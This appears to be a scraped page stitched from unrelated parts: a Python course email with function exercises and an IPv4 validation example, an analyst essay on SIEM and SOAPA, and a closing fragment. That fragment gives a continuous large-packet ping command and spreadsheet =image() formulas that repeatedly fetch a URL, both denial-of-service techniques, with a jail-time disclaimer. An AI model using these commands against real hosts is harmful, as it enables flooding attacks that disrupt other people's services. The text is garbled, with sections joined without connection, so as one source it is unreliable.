DoD Cloud Computing Security
The second half of this course includes some important content for improving your Python programming. In particular, Class6 on Functions and Namespaces, Class8 on Modules, and Class9 on Classes and Objects.
In this email of Learning Python we are going to cover the following:
I. Introduction Week6
Length is 3 minutes
II. Functions, Part1
Length is 12 minutes
Length is 10 minutes
IV. Functions, Part2
Length is 12 minutes
Additional content that you may be interested in
There is a good chapter on functions in “Learn Python the Hard Way” (I would stop after you finish, “What You Should See”).
Darren O’Connor has a blog on “Defined Functions – Python”.
Reference code for these exercises is posted on GitHub at:
1. Create a function that returns the multiplication product of three parameters–x, y, and z. z should have a default value of 1.
a. Call the function with all positional arguments.
b. Call the function with all named arguments.
c. Call the function with a mix of positional and named arguments.
d. Call the function with only two arguments and use the default value for z.
2. Write a function that converts a list to a dictionary where the index of the list is used as the key to the new dictionary (the function should return the new dictionary).
3a. Convert the IP address validation code (Class4, exercise1) into a function, take one variable ‘ip_address’ and return either True or False (depending on whether ‘ip_address’ is a valid IP). Only include IP address checking in the function–no prompting for input, no printing to standard output.
3b. Import this IP address validation function into the Python interpreter shell and test it (use both ‘import x’ and ‘from x import y’).
4. Create a function using your dotted decimal to binary conversion code from Class3, exercise1. In the function–do not prompt for input and do not print to standard output. The function should take one variable ‘ip_address’ and should return the IP address in dotted binary format always padded to eight binary digits (for example 00001010.01011000.00010001.00010111). You might want to create other functions as well (for example, the zero-padding to eight binary digits).
5. Write a program that prompts a user for an IP address, then checks if the IP address is valid, and then converts the IP address to binary (dotted decimal format). Re-use the functions created in exercises 3 and 4 (‘import’ the functions into your new program).
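One way exercises 3 to 5 fit together, as an added example (not the course's reference code). The Class4 validation rules are not reproduced in this email, so valid_ip() is assumed to check syntax and the 0-255 range only; the names valid_ip, pad_octet and ip_to_binary are illustrative, and everything sits in one file rather than being imported from separate modules.

```python
"""Added example: strict IPv4 validation and dotted-binary conversion."""


def valid_ip(ip_address):
    """Return True only for four plain-ASCII decimal octets in 0-255.

    Assumption: syntax and range checks only; no reserved-range policy,
    because the Class4 rules are not shown on this page.
    """
    if not isinstance(ip_address, str):
        return False
    octets = ip_address.split(".")
    if len(octets) != 4:
        return False
    for octet in octets:
        # isascii() + isdigit() rejects '', signs, whitespace and Unicode
        # digits such as a superscript two, which isdigit() alone accepts.
        if not (octet.isascii() and octet.isdigit()):
            return False
        # Over-long octets are refused before int() ever sees them, and
        # leading zeros are refused because some parsers read them as octal.
        if len(octet) > 3 or (len(octet) > 1 and octet[0] == "0"):
            return False
        if int(octet) > 255:
            return False
    return True


def pad_octet(value):
    """Zero-pad one octet (int 0-255) to eight binary digits."""
    return format(value, "08b")


def ip_to_binary(ip_address):
    """Return the address in dotted binary, eight digits per octet."""
    if not valid_ip(ip_address):
        raise ValueError("not a valid IPv4 address: %r" % (ip_address,))
    return ".".join(pad_octet(int(o)) for o in ip_address.split("."))


if __name__ == "__main__":
    # Exercise 5 flow: prompt, validate, convert.
    candidate = input("Enter an IP address: ").strip()
    if valid_ip(candidate):
        print(ip_to_binary(candidate))
    else:
        print("Invalid IP address")
```

Keeping the prompt and print calls under the __main__ guard is what lets the two functions be imported into the interpreter shell, as exercise 3b asks, without side effects.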
A. Why write functions?
II. Functions Part1
A. Function with no parameters
1. Syntax and structure
2. Calling the function
3. Return value
4. Using the return value
B. Function with parameters
2. Default values
C. Various ways of passing arguments to functions
1. Positional arguments
2. Named arguments
3. Mixing positional and named arguments
III. Python Namespaces
A. Functions create their own namespace
B. Name resolution order
IV. Functions Part2
A. Using lists and dicts as function arguments
B. Importing a function
Security information and event management (SIEM) systems have been around for a dozen years or so. During that timeframe, SIEMs evolved from perimeter security event correlation tools, to GRC platforms, to security analytics systems. Early vendors like eSecurity, GuardedNet, Intellitactics, and NetForensics, are distant memories; today’s SIEM market is now dominated by a few leaders: LogRhythm, McAfee (aka: Nitro Security), HP (aka: ArcSight), IBM (aka: QRadar), and Splunk.
Of course, there is a community of innovative upstarts that believe that SIEM is a legacy technology. They proclaim that log management and event correlation can’t keep up with the pace of cybersecurity today, thus you need new technologies like artificial intelligence, machine learning algorithms, and neural networks to consume, process, and analyze security data in real-time.
As an industry analyst, I should be waving my arms around madly, proclaiming that “SIEM is dead,” since that’s what those in my profession tend to do. Sorry, but I don’t think SIEM is dead at all. Instead, enterprise security operations and analytics requirements are forcing rapid consolidation into something new that ESG calls a security operations and analytics platform architecture (SOAPA).
Within SOAPA, SIEM-like functionality still plays a starring role, often aggregating analytics data into a common repository. But unlike the past, SIEM is one of several security tools within SOAPA, and these technologies must be designed for asynchronous cooperation so security analysts can quickly pivot across tools to find data and take action as they need to in real-time.
SOAPA is a dynamic architecture, meaning that new data sources and control planes will be added incrementally over time. I do believe, however, that today’s SOAPA is built with SIEMs (or similar log management and search products/services) and:
Aside from the technologies themselves, here are a few other thoughts on SOAPA:
“In order to protect one must understand how to exploit” – me just now
ping [ip address] -t -l 65500
<pre>=image("http://example.com/sample.pdf?r=0")
=image("http://example.com/sample.pdf?r=1")
=image("http://example.com/sample.pdf?r=2")</pre>
Disclaimer: Most countries have very strict Telecommunications and Computer Abuse laws. Just running these commands against anyone could put you in jail for 99 years. These tools are easily detected.